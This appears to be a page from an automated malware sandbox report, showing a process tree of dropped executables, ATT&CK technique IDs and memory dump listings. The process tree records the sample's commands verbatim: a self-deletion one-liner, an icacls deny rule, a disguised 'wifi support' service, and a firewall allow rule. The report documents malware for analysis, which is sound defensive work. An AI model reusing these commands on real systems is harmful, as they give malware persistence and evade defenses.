\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s seclogon
1⤵
PID:1488

C:\Users\Admin\AppData\Local\Temp\BBB0.exe
C:\Users\Admin\AppData\Local\Temp\BBB0.exe
1⤵
PID:4164

C:\Users\Admin\AppData\Local\Temp\BDE3.exe
C:\Users\Admin\AppData\Local\Temp\BDE3.exe
1⤵
PID:4280

C:\Users\Admin\AppData\Local\Temp\C45C.exe
C:\Users\Admin\AppData\Local\Temp\C45C.exe
1⤵
PID:5080
- C:\Windows\SysWOW64\icacls.exe
  icacls "C:\Users\Admin\AppData\Local\35e226be-1c9a-4ce8-8196-a5f00feb4a3e" /deny *S-1-1-0:(OI)(CI)(DE,DC)
  2⤵
  - Modifies file permissions
  PID:2544
- C:\Users\Admin\AppData\Local\Temp\C45C.exe
  "C:\Users\Admin\AppData\Local\Temp\C45C.exe" --Admin IsNotAutoStart IsNotTask
  2⤵
  PID:4784

C:\Users\Admin\AppData\Local\Temp\CEAE.exe
C:\Users\Admin\AppData\Local\Temp\CEAE.exe
1⤵
PID:2956

C:\Users\Admin\AppData\Local\Temp\D120.exe
C:\Users\Admin\AppData\Local\Temp\D120.exe
1⤵
PID:5536

C:\Users\Admin\AppData\Local\Temp\D71C.exe
C:\Users\Admin\AppData\Local\Temp\D71C.exe
1⤵
PID:4832
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\D71C.exe"
  2⤵
  PID:4456
- - C:\Windows\SysWOW64\timeout.exe
    timeout /T 10 /NOBREAK
    3⤵
    - Delays execution with timeout.exe
    PID:684

C:\Users\Admin\AppData\Local\Temp\E3FE.exe
C:\Users\Admin\AppData\Local\Temp\E3FE.exe
1⤵
PID:4768
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\zueykgvr\
  2⤵
  PID:4296
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\snrjzkmk.exe" C:\Windows\SysWOW64\zueykgvr\
  2⤵
  PID:2308
- C:\Windows\SysWOW64\sc.exe
  "C:\Windows\System32\sc.exe" create zueykgvr binPath= "C:\Windows\SysWOW64\zueykgvr\snrjzkmk.exe /d\"C:\Users\Admin\AppData\Local\Temp\E3FE.exe\"" type= own start= auto DisplayName= "wifi support"
  2⤵
  PID:4160
- C:\Windows\SysWOW64\sc.exe
  "C:\Windows\System32\sc.exe" description zueykgvr "wifi internet conection"
  2⤵
  PID:2112
- C:\Windows\SysWOW64\sc.exe
  "C:\Windows\System32\sc.exe" start zueykgvr
  2⤵
  PID:5240
- C:\Windows\SysWOW64\netsh.exe
  "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
  2⤵
  PID:5876

C:\Users\Admin\AppData\Local\Temp\EA29.exe
C:\Users\Admin\AppData\Local\Temp\EA29.exe
1⤵
PID:3312

C:\Windows\SysWOW64\zueykgvr\snrjzkmk.exe
C:\Windows\SysWOW64\zueykgvr\snrjzkmk.exe /d"C:\Users\Admin\AppData\Local\Temp\E3FE.exe"
1⤵
PID:4708
- C:\Windows\SysWOW64\svchost.exe
  svchost.exe
  2⤵
  PID:4924

C:\Users\Admin\AppData\Local\Temp\95B.exe
C:\Users\Admin\AppData\Local\Temp\95B.exe
1⤵
PID:5952

C:\Users\Admin\AppData\Local\Temp\1D51.exe
C:\Users\Admin\AppData\Local\Temp\1D51.exe
1⤵
PID:5824

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:4548

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:5484

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

BITS Jobs

T1197

Modify Existing Service

T1031

New Service

T1050

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

New Service

T1050

Defense Evasion

BITS Jobs

T1197

File and Directory Permissions Modification

T1222

Install Root Certificate

T1130

Modify Registry

T1112

Web Service

T1102

Credential Access

Discovery

Query Registry

T1012

Remote System Discovery

T1018

Software Discovery

T1518

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/196-169-0x0000014B3CD40000-0x0000014B3CDB0000-memory.dmp

Filesize
448KB

Download
memory/196-205-0x0000014B3F300000-0x0000014B3F3FF000-memory.dmp

Filesize
1020KB

Download
memory/352-170-0x000001E078E40000-0x000001E078EB0000-memory.dmp

Filesize
448KB

Download
memory/352-294-0x000001E078F20000-0x000001E078F90000-memory.dmp

Filesize
448KB

Download
memory/928-178-0x0000020859E40000-0x0000020859EB0000-memory.dmp

Filesize
448KB

Download
memory/1104-176-0x0000026B11320000-0x0000026B11390000-memory.dmp

Filesize
448KB

Download
memory/1228-184-0x0000015777240000-0x00000157772B0000-memory.dmp

Filesize
448KB

Download
memory/1276-186-0x000001C197B60000-0x000001C197BD0000-memory.dmp

Filesize
448KB

Download
memory/1352-180-0x000001A927A50000-0x000001A927AC0000-memory.dmp

Filesize
448KB

Download
memory/1852-182-0x000001AD22F50000-0x000001AD22FC0000-memory.dmp

Filesize
448KB

Download
memory/2060-208-0x0000000000400000-0x0000000000416000-memory.dmp

Filesize
88KB

Download
memory/2456-172-0x00000122DE830000-0x00000122DE8A0000-memory.dmp

Filesize
448KB

Download
memory/2456-284-0x00000122DE8A0000-0x00000122DE910000-memory.dmp

Filesize
448KB

Download
memory/2472-289-0x000001B8EB340000-0x000001B8EB3B0000-memory.dmp

Filesize
448KB

Download
memory/2472-174-0x000001B8EADD0000-0x000001B8EAE40000-memory.dmp

Filesize
448KB

Download
memory/2616-188-0x000001C469900000-0x000001C469970000-memory.dmp

Filesize
448KB

Download
memory/2632-193-0x0000000000400000-0x000000000042B000-memory.dmp

Filesize
172KB

Download
memory/2644-190-0x000001BE65C40000-0x000001BE65CB0000-memory.dmp

Filesize
448KB

Download
memory/2664-129-0x0000000004B22000-0x0000000004C23000-memory.dmp

Filesize
1.0MB

Download
memory/2664-130-0x0000000004D30000-0x0000000004D8C000-memory.dmp

Filesize
368KB

Download
memory/2684-133-0x0000000000FE0000-0x0000000000FFC000-memory.dmp

Filesize
112KB

Download
memory/2684-128-0x0000000000FD0000-0x0000000000FD1000-memory.dmp

Filesize
4KB

Download
memory/2684-135-0x0000000001000000-0x0000000001001000-memory.dmp

Filesize
4KB

Download
memory/2684-167-0x0000000002D80000-0x0000000002D82000-memory.dmp

Filesize
8KB

Download
memory/2684-126-0x0000000000AD0000-0x0000000000AD1000-memory.dmp

Filesize
4KB

Download
memory/2864-166-0x000001EB92840000-0x000001EB928B0000-memory.dmp

Filesize
448KB

Download
memory/2864-274-0x000001EB928B0000-0x000001EB92920000-memory.dmp

Filesize
448KB

Download
memory/3216-271-0x0000020B7F600000-0x0000020B7F670000-memory.dmp

Filesize
448KB

Download
memory/3216-132-0x0000020B7F040000-0x0000020B7F08B000-memory.dmp

Filesize
300KB

Download
memory/3216-270-0x0000020B7F330000-0x0000020B7F37B000-memory.dmp

Filesize
300KB

Download
memory/3216-163-0x0000020B7F2A0000-0x0000020B7F310000-memory.dmp

Filesize
448KB

Download
memory/3712-199-0x00000000001E0000-0x00000000001E1000-memory.dmp

Filesize
4KB

Download
memory/3776-203-0x0000000002870000-0x0000000002872000-memory.dmp

Filesize
8KB

Download
memory/4128-349-0x0000000004540000-0x0000000004541000-memory.dmp

Filesize
4KB

Download
memory/4144-286-0x0000000000400000-0x0000000000447000-memory.dmp

Filesize
284KB

Download
memory/4144-278-0x0000000000400000-0x0000000000447000-memory.dmp

Filesize
284KB

Download
memory/4148-214-0x00000000001E0000-0x00000000001E1000-memory.dmp

Filesize
4KB

Download
memory/4224-229-0x00000000021B2000-0x00000000021B4000-memory.dmp

Filesize
8KB

Download
memory/4224-230-0x00000000021B5000-0x00000000021B7000-memory.dmp

Filesize
8KB

Download
memory/4224-231-0x00000000021B4000-0x00000000021B5000-memory.dmp

Filesize
4KB

Download
memory/4224-222-0x00000000021B0000-0x00000000021B2000-memory.dmp

Filesize
8KB

Download
memory/4260-223-0x0000000000720000-0x0000000000722000-memory.dmp

Filesize
8KB

Download
memory/4304-279-0x0000000000870000-0x00000000009BA000-memory.dmp

Filesize
1.3MB

Download
memory/4320-239-0x00000000015F5000-0x00000000015F6000-memory.dmp

Filesize
4KB

Download
memory/4320-238-0x00000000015F2000-0x00000000015F4000-memory.dmp

Filesize
8KB

Download
memory/4320-228-0x00000000015F0000-0x00000000015F2000-memory.dmp

Filesize
8KB

Download
memory/4400-245-0x00000000001F0000-0x0000000000200000-memory.dmp

Filesize
64KB

Download
memory/4400-246-0x00000000006F0000-0x0000000000702000-memory.dmp

Filesize
72KB

Download
memory/4440-254-0x0000000000400000-0x0000000000448000-memory.dmp

Filesize
288KB

Download
memory/4440-235-0x0000000000F80000-0x0000000000F8D000-memory.dmp

Filesize
52KB

Download
memory/4588-291-0x0000000004770000-0x00000000047CC000-memory.dmp

Filesize
368KB

Download
memory/4588-275-0x000000000451D000-0x000000000461E000-memory.dmp

Filesize
1.0MB

Download
memory/4988-268-0x0000000140000000-0x0000000140383000-memory.dmp

Filesize
3.5MB

Download
memory/4988-261-0x0000000140000000-0x0000000140383000-memory.dmp

Filesize
3.5MB

Download
memory/5152-283-0x0000000140000000-0x000000014070A000-memory.dmp

Filesize
7.0MB

Download
memory/5152-297-0x00000237AAFE0000-0x00000237AAFF4000-memory.dmp

Filesize
80KB

Download

Resubmissions

Analysis

Sharing

Errors

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads